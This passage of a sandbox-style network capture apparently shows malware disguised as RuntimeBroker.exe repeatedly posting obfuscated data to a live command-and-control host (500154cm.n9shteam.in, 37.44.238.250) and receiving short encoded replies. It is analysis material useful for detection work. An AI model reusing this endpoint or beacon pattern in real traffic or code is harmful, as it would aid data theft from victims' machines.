                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Content-Length: 4
                                                                                                            Connection: keep-alive
                                                                                                            Data Raw: 30 56 58 5a
                                                                                                            Data Ascii: 0VXZ


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
19 | 192.168.2.4 | 49760 | 37.44.238.250 | 80 | 4076 | C:\Recovery\RuntimeBroker.exe
Timestamp | Bytes transferred | Direction | Data
Nov 12, 2024 00:42:37.640408993 CET | 316 | OUT | POST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                            Host: 500154cm.n9shteam.in
                                                                                                            Content-Length: 2512
                                                                                                            Expect: 100-continue
                                                                                                            Connection: Keep-Alive
                                                                                                            Nov 12, 2024 00:42:37.994327068 CET2512OUTData Raw: 54 5f 5b 54 53 5d 59 5c 5c 58 5a 51 50 52 58 52 5b 56 5e 5b 55 59 5a 54 5f 5f 42 5c 57 56 5b 53 5e 5f 52 5a 59 5b 53 5e 5b 5a 5b 56 53 5a 5e 5f 53 5e 5b 5e 5e 5a 53 56 50 59 52 52 50 50 50 5b 5c 51 5d 5c 55 5c 55 50 46 5c 43 52 5a 5d 58 51 5f 54
                                                                                                            Data Ascii: T_[TS]Y\\XZQPRXR[V^[UYZT__B\WV[S^_RZY[S^[Z[VSZ^_S^[^^ZSVPYRRPPP[\Q]\U\UPF\CRZ]XQ_TZ_S_T_V^Q]ZTTZ]P\WY[YU[^YZ[R^]\XTR^_^\^[]_X]XZ]TX[[\_SCX\[Y^\TWUV]VW][\R]]]^UU\]Q_[[XPZS_Z\YYP[XYWXZS\'^-3"]?;2!&%%7!^#=6X!8%3*5% !^)5&[!"^.
Nov 12, 2024 00:42:38.225048065 CET | 25 | IN | HTTP/1.1 100 Continue
Nov 12, 2024 00:42:38.297266006 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                                            Server: nginx
                                                                                                            Date: Mon, 11 Nov 2024 23:42:38 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Content-Length: 4
                                                                                                            Connection: keep-alive
                                                                                                            Data Raw: 30 56 58 5a
                                                                                                            Data Ascii: 0VXZ


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
20 | 192.168.2.4 | 49761 | 37.44.238.250 | 80 | 4076 | C:\Recovery\RuntimeBroker.exe
Timestamp | Bytes transferred | Direction | Data
Nov 12, 2024 00:42:38.553230047 CET | 316 | OUT | POST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                            Host: 500154cm.n9shteam.in
                                                                                                            Content-Length: 2512
                                                                                                            Expect: 100-continue
                                                                                                            Connection: Keep-Alive
                                                                                                            Nov 12, 2024 00:42:38.900804996 CET2512OUTData Raw: 54 5f 5b 57 56 59 59 5f 5c 58 5a 51 50 5f 58 52 5b 52 5e 5f 55 58 5a 5d 5f 5f 42 5c 57 56 5b 53 5e 5f 52 5a 59 5b 53 5e 5b 5a 5b 56 53 5a 5e 5f 53 5e 5b 5e 5e 5a 53 56 50 59 52 52 50 50 50 5b 5c 51 5d 5c 55 5c 55 50 46 5c 43 52 5a 5d 58 51 5f 54
                                                                                                            Data Ascii: T_[WVYY_\XZQP_XR[R^_UXZ]__B\WV[S^_RZY[S^[Z[VSZ^_S^[^^ZSVPYRRPPP[\Q]\U\UPF\CRZ]XQ_TZ_S_T_V^Q]ZTTZ]P\WY[YU[^YZ[R^]\XTR^_^\^[]_X]XZ]TX[[\_SCX\[Y^\TWUV]VW][\R]]]^UU\]Q_[[XPZS_Z\YYP[XYWXZS\'-5=(%U!:3!((0!#+"01*5= =Z+%&[!"^.=
Nov 12, 2024 00:42:39.133013010 CET | 25 | IN | HTTP/1.1 100 Continue
Nov 12, 2024 00:42:39.211893082 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                                            Server: nginx
                                                                                                            Date: Mon, 11 Nov 2024 23:42:39 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Content-Length: 4
                                                                                                            Connection: keep-alive
                                                                                                            Data Raw: 30 56 58 5a
                                                                                                            Data Ascii: 0VXZ


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
21 | 192.168.2.4 | 49762 | 37.44.238.250 | 80 | 4076 | C:\Recovery\RuntimeBroker.exe
Timestamp | Bytes transferred | Direction | Data
Nov 12, 2024 00:42:39.426619053 CET | 316 | OUT | POST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                            Host: 500154cm.n9shteam.in
                                                                                                            Content-Length: 2504
                                                                                                            Expect: 100-continue
                                                                                                            Connection: Keep-Alive
                                                                                                            Nov 12, 2024 00:42:39.776876926 CET2504OUTData Raw: 54 5f 5b 5e 56 58 59 5c 5c 58 5a 51 50 5a 58 51 5b 52 5e 5b 55 5f 5a 5e 5f 5f 42 5c 57 56 5b 53 5e 5f 52 5a 59 5b 53 5e 5b 5a 5b 56 53 5a 5e 5f 53 5e 5b 5e 5e 5a 53 56 50 59 52 52 50 50 50 5b 5c 51 5d 5c 55 5c 55 50 46 5c 43 52 5a 5d 58 51 5f 54
                                                                                                            Data Ascii: T_[^VXY\\XZQPZXQ[R^[U_Z^__B\WV[S^_RZY[S^[Z[VSZ^_S^[^^ZSVPYRRPPP[\Q]\U\UPF\CRZ]XQ_TZ_S_T_V^Q]ZTTZ]P\WY[YU[^YZ[R^]\XTR^_^\^[]_X]XZ]TX[[\_SCX\[Y^\TWUV]VW][\R]]]^UU\]Q_[[XPZS_Z\YYP[XYWXZS\$.=)-U6<:E%%358U*3^"(-U3X!)%Z4#!\<%&[!"^.=
Nov 12, 2024 00:42:40.012104034 CET | 25 | IN | HTTP/1.1 100 Continue
Nov 12, 2024 00:42:40.087781906 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                                            Server: nginx
                                                                                                            Date: Mon, 11 Nov 2024 23:42:39 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Content-Length: 4
                                                                                                            Connection: keep-alive
                                                                                                            Data Raw: 30 56 58 5a
                                                                                                            Data Ascii: 0VXZ


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
22 | 192.168.2.4 | 49763 | 37.44.238.250 | 80 | 4076 | C:\Recovery\RuntimeBroker.exe
Timestamp | Bytes transferred | Direction | Data
Nov 12, 2024 00:42:40.590864897 CET | 316 | OUT | POST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                            Host: 500154cm.n9shteam.in
                                                                                                            Content-Length: 2512
                                                                                                            Expect: 100-continue
                                                                                                            Connection: Keep-Alive
                                                                                                            Nov 12, 2024 00:42:40.947431087 CET2512OUTData Raw: 51 55 5e 54 53 5d 59 58 5c 58 5a 51 50 59 58 57 5b 50 5e 51 55 5b 5a 5c 5f 5f 42 5c 57 56 5b 53 5e 5f 52 5a 59 5b 53 5e 5b 5a 5b 56 53 5a 5e 5f 53 5e 5b 5e 5e 5a 53 56 50 59 52 52 50 50 50 5b 5c 51 5d 5c 55 5c 55 50 46 5c 43 52 5a 5d 58 51 5f 54
                                                                                                            Data Ascii: QU^TS]YX\XZQPYXW[P^QU[Z\__B\WV[S^_RZY[S^[Z[VSZ^_S^[^^ZSVPYRRPPP[\Q]\U\UPF\CRZ]XQ_TZ_S_T_V^Q]ZTTZ]P\WY[YU[^YZ[R^]\XTR^_^\^[]_X]XZ]TX[[\_SCX\[Y^\TWUV]VW][\R]]]^UU\]Q_[[XPZS_Z\YYP[XYWXZS\'.0)&5:D$C0^5(4T) 96%W0-*)5705?&[!"^.%
Nov 12, 2024 00:42:41.175642014 CET | 25 | IN | HTTP/1.1 100 Continue
Nov 12, 2024 00:42:41.252226114 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                                            Server: nginx
                                                                                                            Date: Mon, 11 Nov 2024 23:42:41 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Content-Length: 4
                                                                                                            Connection: keep-alive
                                                                                                            Data Raw: 30 56 58 5a
                                                                                                            Data Ascii: 0VXZ


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
23 | 192.168.2.4 | 49764 | 37.44.238.250 | 80 | 4076 | C:\Recovery\RuntimeBroker.exe
Timestamp | Bytes transferred | Direction | Data
Nov 12, 2024 00:42:41.396047115 CET | 316 | OUT | POST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                            Host: 500154cm.n9shteam.in
                                                                                                            Content-Length: 1840
                                                                                                            Expect: 100-continue
                                                                                                            Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
24 | 192.168.2.4 | 49765 | 37.44.238.250 | 80 | 4076 | C:\Recovery\RuntimeBroker.exe
Timestamp | Bytes transferred | Direction | Data
Nov 12, 2024 00:42:41.473341942 CET | 316 | OUT | POST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                            Host: 500154cm.n9shteam.in
                                                                                                            Content-Length: 2512
                                                                                                            Expect: 100-continue
                                                                                                            Connection: Keep-Alive
                                                                                                            Nov 12, 2024 00:42:41.822426081 CET2512OUTData Raw: 51 52 5b 56 56 5b 59 5b 5c 58 5a 51 50 52 58 55 5b 51 5e 50 55 58 5a 5e 5f 5f 42 5c 57 56 5b 53 5e 5f 52 5a 59 5b 53 5e 5b 5a 5b 56 53 5a 5e 5f 53 5e 5b 5e 5e 5a 53 56 50 59 52 52 50 50 50 5b 5c 51 5d 5c 55 5c 55 50 46 5c 43 52 5a 5d 58 51 5f 54
                                                                                                            Data Ascii: QR[VV[Y[\XZQPRXU[Q^PUXZ^__B\WV[S^_RZY[S^[Z[VSZ^_S^[^^ZSVPYRRPPP[\Q]\U\UPF\CRZ]XQ_TZ_S_T_V^Q]ZTTZ]P\WY[YU[^YZ[R^]\XTR^_^\^[]_X]XZ]TX[[\_SCX\[Y^\TWUV]VW][\R]]]^UU\]Q_[[XPZS_Z\YYP[XYWXZS\'.1>;S#?90^5 )Y#+)W31[>%1# "+&[!"^.
Nov 12, 2024 00:42:42.041311026 CET | 25 | IN | HTTP/1.1 100 Continue
Nov 12, 2024 00:42:42.121215105 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                                            Server: nginx
                                                                                                            Date: Mon, 11 Nov 2024 23:42:41 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Content-Length: 4
                                                                                                            Connection: keep-alive
                                                                                                            Data Raw: 30 56 58 5a
                                                                                                            Data Ascii: 0VXZ


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
25 | 192.168.2.4 | 49766 | 37.44.238.250 | 80 | 4076 | C:\Recovery\RuntimeBroker.exe
Timestamp | Bytes transferred | Direction | Data
Nov 12, 2024 00:42:42.320527077 CET | 292 | OUT | POST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                            Host: 500154cm.n9shteam.in
                                                                                                            Content-Length: 2504
                                                                                                            Expect: 100-continue
                                                                                                            Nov 12, 2024 00:42:42.666443110 CET2504OUTData Raw: 51 54 5b 53 53 5c 59 5c 5c 58 5a 51 50 5a 58 52 5b 5c 5e 5d 55 58 5a 59 5f 5f 42 5c 57 56 5b 53 5e 5f 52 5a 59 5b 53 5e 5b 5a 5b 56 53 5a 5e 5f 53 5e 5b 5e 5e 5a 53 56 50 59 52 52 50 50 50 5b 5c 51 5d 5c 55 5c 55 50 46 5c 43 52 5a 5d 58 51 5f 54
                                                                                                            Data Ascii: QT[SS\Y\\XZQPZXR[\^]UXZY__B\WV[S^_RZY[S^[Z[VSZ^_S^[^^ZSVPYRRPPP[\Q]\U\UPF\CRZ]XQ_TZ_S_T_V^Q]ZTTZ]P\WY[YU[^YZ[R^]\XTR^_^\^[]_X]XZ]TX[[\_SCX\[Y^\TWUV]VW][\R]]]^UU\]Q_[[XPZS_Z\YYP[XYWXZS\$9*>(25<"A036$*3.X5&'.1X=&:Y!0*)%&[!"^.1
Nov 12, 2024 00:42:42.885449886 CET | 25 | IN | HTTP/1.1 100 Continue
Nov 12, 2024 00:42:42.967684984 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                                            Server: nginx
                                                                                                            Date: Mon, 11 Nov 2024 23:42:42 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Content-Length: 4
                                                                                                            Connection: keep-alive
                                                                                                            Data Raw: 30 56 58 5a
                                                                                                            Data Ascii: 0VXZ


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
26 | 192.168.2.4 | 49767 | 37.44.238.250 | 80 | 4076 | C:\Recovery\RuntimeBroker.exe
Timestamp | Bytes transferred | Direction | Data
Nov 12, 2024 00:42:43.358318090 CET | 318 | OUT | POST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                            Host: 500154cm.n9shteam.in
                                                                                                            Content-Length: 232820
                                                                                                            Expect: 100-continue
                                                                                                            Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
27 | 192.168.2.4 | 49768 | 37.44.238.250 | 80 | 4076 | C:\Recovery\RuntimeBroker.exe
Timestamp | Bytes transferred | Direction | Data
Nov 12, 2024 00:42:43.415626049 CET | 316 | OUT | POST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                            Host: 500154cm.n9shteam.in
                                                                                                            Content-Length: 2512
                                                                                                            Expect: 100-continue
                                                                                                            Connection: Keep-Alive
                                                                                                            Nov 12, 2024 00:42:43.760185957 CET2512OUTData Raw: 51 55 5b 5e 53 5d 59 5a 5c 58 5a 51 50 5d 58 51 5b 52 5e 5a 55 5b 5a 5a 5f 5f 42 5c 57 56 5b 53 5e 5f 52 5a 59 5b 53 5e 5b 5a 5b 56 53 5a 5e 5f 53 5e 5b 5e 5e 5a 53 56 50 59 52 52 50 50 50 5b 5c 51 5d 5c 55 5c 55 50 46 5c 43 52 5a 5d 58 51 5f 54
                                                                                                            Data Ascii: QU[^S]YZ\XZQP]XQ[R^ZU[ZZ__B\WV[S^_RZY[S^[Z[VSZ^_S^[^^ZSVPYRRPPP[\Q]\U\UPF\CRZ]XQ_TZ_S_T_V^Q]ZTTZ]P\WY[YU[^YZ[R^]\XTR^_^\^[]_X]XZ]TX[[\_SCX\[Y^\TWUV]VW][\R]]]^UU\]Q_[[XPZS_Z\YYP[XYWXZS\$:V6*:5.'0Y ;<) =#(T'6*5!#>+&[!"^.
Nov 12, 2024 00:42:43.983134985 CET | 25 | IN | HTTP/1.1 100 Continue
Nov 12, 2024 00:42:44.069796085 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                                            Server: nginx
                                                                                                            Date: Mon, 11 Nov 2024 23:42:43 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Content-Length: 4
                                                                                                            Connection: keep-alive
                                                                                                            Data Raw: 30 56 58 5a
                                                                                                            Data Ascii: 0VXZ


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
28 | 192.168.2.4 | 49769 | 37.44.238.250 | 80 | 4076 | C:\Recovery\RuntimeBroker.exe
Timestamp | Bytes transferred | Direction | Data
Nov 12, 2024 00:42:44.212867022 CET | 292 | OUT | POST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                            Host: 500154cm.n9shteam.in
                                                                                                            Content-Length: 2512
                                                                                                            Expect: 100-continue
                                                                                                            Nov 12, 2024 00:42:44.557012081 CET2512OUTData Raw: 51 54 5b 54 56 51 59 5d 5c 58 5a 51 50 59 58 54 5b 55 5e 59 55 55 5a 5a 5f 5f 42 5c 57 56 5b 53 5e 5f 52 5a 59 5b 53 5e 5b 5a 5b 56 53 5a 5e 5f 53 5e 5b 5e 5e 5a 53 56 50 59 52 52 50 50 50 5b 5c 51 5d 5c 55 5c 55 50 46 5c 43 52 5a 5d 58 51 5f 54
                                                                                                            Data Ascii: QT[TVQY]\XZQPYXT[U^YUUZZ__B\WV[S^_RZY[S^[Z[VSZ^_S^[^^ZSVPYRRPPP[\Q]\U\UPF\CRZ]XQ_TZ_S_T_V^Q]ZTTZ]P\WY[YU[^YZ[R^]\XTR^_^\^[]_X]XZ]TX[[\_SCX\[Y^\TWUV]VW][\R]]]^UU\]Q_[[XPZS_Z\YYP[XYWXZS\'.#!*.5?>'53"8R) :Y58$X=*"]73*)5&[!"^.%
Nov 12, 2024 00:42:44.798010111 CET | 25 | IN | HTTP/1.1 100 Continue
Nov 12, 2024 00:42:44.872407913 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                                            Server: nginx
                                                                                                            Date: Mon, 11 Nov 2024 23:42:44 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Content-Length: 4
                                                                                                            Connection: keep-alive
                                                                                                            Data Raw: 30 56 58 5a
                                                                                                            Data Ascii: 0VXZ


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
29 | 192.168.2.4 | 49770 | 37.44.238.250 | 80 | 4076 | C:\Recovery\RuntimeBroker.exe
Timestamp | Bytes transferred | Direction | Data
Nov 12, 2024 00:42:45.011274099 CET | 316 | OUT | POST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                            Host: 500154cm.n9shteam.in
                                                                                                            Content-Length: 2512
                                                                                                            Expect: 100-continue
                                                                                                            Connection: Keep-Alive
                                                                                                            Nov 12, 2024 00:42:45.369322062 CET2512OUTData Raw: 54 5f 5b 52 56 5c 5c 58 5c 58 5a 51 50 5e 58 53 5b 5c 5e 5d 55 58 5a 59 5f 5f 42 5c 57 56 5b 53 5e 5f 52 5a 59 5b 53 5e 5b 5a 5b 56 53 5a 5e 5f 53 5e 5b 5e 5e 5a 53 56 50 59 52 52 50 50 50 5b 5c 51 5d 5c 55 5c 55 50 46 5c 43 52 5a 5d 58 51 5f 54
                                                                                                            Data Ascii: T_[RV\\X\XZQP^XS[\^]UXZY__B\WV[S^_RZY[S^[Z[VSZ^_S^[^^ZSVPYRRPPP[\Q]\U\UPF\CRZ]XQ_TZ_S_T_V^Q]ZTTZ]P\WY[YU[^YZ[R^]\XTR^_^\^[]_X]XZ]TX[[\_SCX\[Y^\TWUV]VW][\R]]]^UU\]Q_[[XPZS_Z\YYP[XYWXZS\'^-V>>."<@%6(68T(#)!6$"(&>4 &<5&[!"^.9
Nov 12, 2024 00:42:45.579231977 CET | 25 | IN | HTTP/1.1 100 Continue
Nov 12, 2024 00:42:45.661696911 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                                            Server: nginx
                                                                                                            Date: Mon, 11 Nov 2024 23:42:45 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Content-Length: 4
                                                                                                            Connection: keep-alive
                                                                                                            Data Raw: 30 56 58 5a
                                                                                                            Data Ascii: 0VXZ


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
30 | 192.168.2.4 | 49771 | 37.44.238.250 | 80 | 4076 | C:\Recovery\RuntimeBroker.exe
Timestamp | Bytes transferred | Direction | Data
Nov 12, 2024 00:42:45.863900900 CET | 316 | OUT | POST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                            Host: 500154cm.n9shteam.in
                                                                                                            Content-Length: 2504
                                                                                                            Expect: 100-continue
                                                                                                            Connection: Keep-Alive
                                                                                                            Nov 12, 2024 00:42:46.213124990 CET2504OUTData Raw: 51 55 5b 51 53 5d 59 5a 5c 58 5a 51 50 5a 58 56 5b 54 5e 58 55 5a 5a 5f 5f 5f 42 5c 57 56 5b 53 5e 5f 52 5a 59 5b 53 5e 5b 5a 5b 56 53 5a 5e 5f 53 5e 5b 5e 5e 5a 53 56 50 59 52 52 50 50 50 5b 5c 51 5d 5c 55 5c 55 50 46 5c 43 52 5a 5d 58 51 5f 54
                                                                                                            Data Ascii: QU[QS]YZ\XZQPZXV[T^XUZZ___B\WV[S^_RZY[S^[Z[VSZ^_S^[^^ZSVPYRRPPP[\Q]\U\UPF\CRZ]XQ_TZ_S_T_V^Q]ZTTZ]P\WY[YU[^YZ[R^]\XTR^_^\^[]_X]XZ]TX[[\_SCX\[Y^\TWUV]VW][\R]]]^UU\]Q_[[XPZS_Z\YYP[XYWXZS\'^- "*5<*A$[!/>>Z5&3*:X7-](&[!"^.!
Nov 12, 2024 00:42:46.428621054 CET | 25 | IN | HTTP/1.1 100 Continue


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
31 | 192.168.2.4 | 49772 | 37.44.238.250 | 80 | 4076 | C:\Recovery\RuntimeBroker.exe
Timestamp | Bytes transferred | Direction | Data
Nov 12, 2024 00:42:46.484870911 CET | 316 | OUT | POST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                            Host: 500154cm.n9shteam.in
                                                                                                            Content-Length: 1840
                                                                                                            Expect: 100-continue
                                                                                                            Connection: Keep-Alive
                                                                                                            Nov 12, 2024 00:42:46.839109898 CET1840OUTData Raw: 54 54 5b 5f 53 5a 5c 5a 5c 58 5a 51 50 58 58 5d 5b 5d 5e 59 55 5b 5a 5b 5f 5f 42 5c 57 56 5b 53 5e 5f 52 5a 59 5b 53 5e 5b 5a 5b 56 53 5a 5e 5f 53 5e 5b 5e 5e 5a 53 56 50 59 52 52 50 50 50 5b 5c 51 5d 5c 55 5c 55 50 46 5c 43 52 5a 5d 58 51 5f 54
                                                                                                            Data Ascii: TT[_SZ\Z\XZQPXX][]^YU[Z[__B\WV[S^_RZY[S^[Z[VSZ^_S^[^^ZSVPYRRPPP[\Q]\U\UPF\CRZ]XQ_TZ_S_T_V^Q]ZTTZ]P\WY[YU[^YZ[R^]\XTR^_^\^[]_X]XZ]TX[[\_SCX\[Y^\TWUV]VW][\R]]]^UU\]Q_[[XPZS_Z\YYP[XYWXZS\$- **>!?6E050[5+=3"$-!=%]#0!?&[!"^.!
Nov 12, 2024 00:42:47.068157911 CET | 25 | IN | HTTP/1.1 100 Continue
Nov 12, 2024 00:42:47.147691965 CET | 308 | IN | HTTP/1.1 200 OK
                                                                                                            Server: nginx
                                                                                                            Date: Mon, 11 Nov 2024 23:42:46 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Content-Length: 152
                                                                                                            Connection: keep-alive
                                                                                                            Data Raw: 02 1e 21 10 2b 3d 33 5a 20 3f 24 53 3a 10 03 0f 32 20 2f 02 2b 01 3f 00 22 3d 34 1f 2c 33 3a 0d 37 2d 37 06 27 3a 35 5f 37 3f 00 09 3f 28 21 5b 05 12 22 07 23 5d 3c 55 28 2c 0d 06 2d 31 0d 5b 22 56 28 05 2c 39 2f 53 29 5f 3e 0f 24 12 3e 1e 24 08 3f 07 3a 3d 21 04 2b 3c 37 1e 36 34 2e 55 0b 11 23 50 24 38 27 1d 22 3c 3b 5a 31 3e 38 57 35 03 32 18 26 39 38 54 25 3a 2b 10 25 31 07 01 26 22 0f 06 32 03 36 02 2a 3a 3f 5b 27 3a 23 51 2d 05 2f 56 03 3d 5b 57
                                                                                                            Data Ascii: !+=3Z ?$S:2 /+?"=4,3:7-7':5_7??(!["#]<U(,-1["V(,9/S)_>$>$?:=!+<764.U#P$8'"<;Z1>8W52&98T%:+%1&"26*:?[':#Q-/V=[W


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
32 | 192.168.2.4 | 49773 | 37.44.238.250 | 80 | 4076 | C:\Recovery\RuntimeBroker.exe
Timestamp | Bytes transferred | Direction | Data
Nov 12, 2024 00:42:46.647289991 CET | 316 | OUT | POST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                            Host: 500154cm.n9shteam.in
                                                                                                            Content-Length: 2512
                                                                                                            Expect: 100-continue
                                                                                                            Connection: Keep-Alive
                                                                                                            Nov 12, 2024 00:42:46.994502068 CET2512OUTData Raw: 51 53 5b 52 53 5a 59 59 5c 58 5a 51 50 53 58 5c 5b 5d 5e 50 55 54 5a 5d 5f 5f 42 5c 57 56 5b 53 5e 5f 52 5a 59 5b 53 5e 5b 5a 5b 56 53 5a 5e 5f 53 5e 5b 5e 5e 5a 53 56 50 59 52 52 50 50 50 5b 5c 51 5d 5c 55 5c 55 50 46 5c 43 52 5a 5d 58 51 5f 54
                                                                                                            Data Ascii: QS[RSZYY\XZQPSX\[]^PUTZ]__B\WV[S^_RZY[S^[Z[VSZ^_S^[^^ZSVPYRRPPP[\Q]\U\UPF\CRZ]XQ_TZ_S_T_V^Q]ZTTZ]P\WY[YU[^YZ[R^]\XTR^_^\^[]_X]XZ]TX[[\_SCX\[Y^\TWUV]VW][\R]]]^UU\]Q_[[XPZS_Z\YYP[XYWXZS\':6>-5600_5+)0:#86'>6)=7V5](5&[!"^.
Nov 12, 2024 00:42:47.230547905 CET | 25 | IN | HTTP/1.1 100 Continue
Nov 12, 2024 00:42:47.307888985 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                                            Server: nginx
                                                                                                            Date: Mon, 11 Nov 2024 23:42:47 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Content-Length: 4
                                                                                                            Connection: keep-alive
                                                                                                            Data Raw: 30 56 58 5a
                                                                                                            Data Ascii: 0VXZ


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
33 | 192.168.2.4 | 49774 | 37.44.238.250 | 80 | 4076 | C:\Recovery\RuntimeBroker.exe
Timestamp | Bytes transferred | Direction | Data
Nov 12, 2024 00:42:47.450781107 CET | 292 | OUT | POST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                            Host: 500154cm.n9shteam.in
                                                                                                            Content-Length: 2512
                                                                                                            Expect: 100-continue
                                                                                                            Nov 12, 2024 00:42:47.806862116 CET2512OUTData Raw: 54 55 5b 52 53 5b 59 5e 5c 58 5a 51 50 58 58 51 5b 52 5e 5f 55 5b 5a 5e 5f 5f 42 5c 57 56 5b 53 5e 5f 52 5a 59 5b 53 5e 5b 5a 5b 56 53 5a 5e 5f 53 5e 5b 5e 5e 5a 53 56 50 59 52 52 50 50 50 5b 5c 51 5d 5c 55 5c 55 50 46 5c 43 52 5a 5d 58 51 5f 54
                                                                                                            Data Ascii: TU[RS[Y^\XZQPXXQ[R^_U[Z^__B\WV[S^_RZY[S^[Z[VSZ^_S^[^^ZSVPYRRPPP[\Q]\U\UPF\CRZ]XQ_TZ_S_T_V^Q]ZTTZ]P\WY[YU[^YZ[R^]\XTR^_^\^[]_X]XZ]TX[[\_SCX\[Y^\TWUV]VW][\R]]]^UU\]Q_[[XPZS_Z\YYP[XYWXZS\'9 *+.6/5$C8Z"+$T)3&[!8-$X1*61 3>+&[!"^.!
Nov 12, 2024 00:42:48.036242008 CET | 25 | IN | HTTP/1.1 100 Continue
Nov 12, 2024 00:42:48.116904974 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                                            Server: nginx
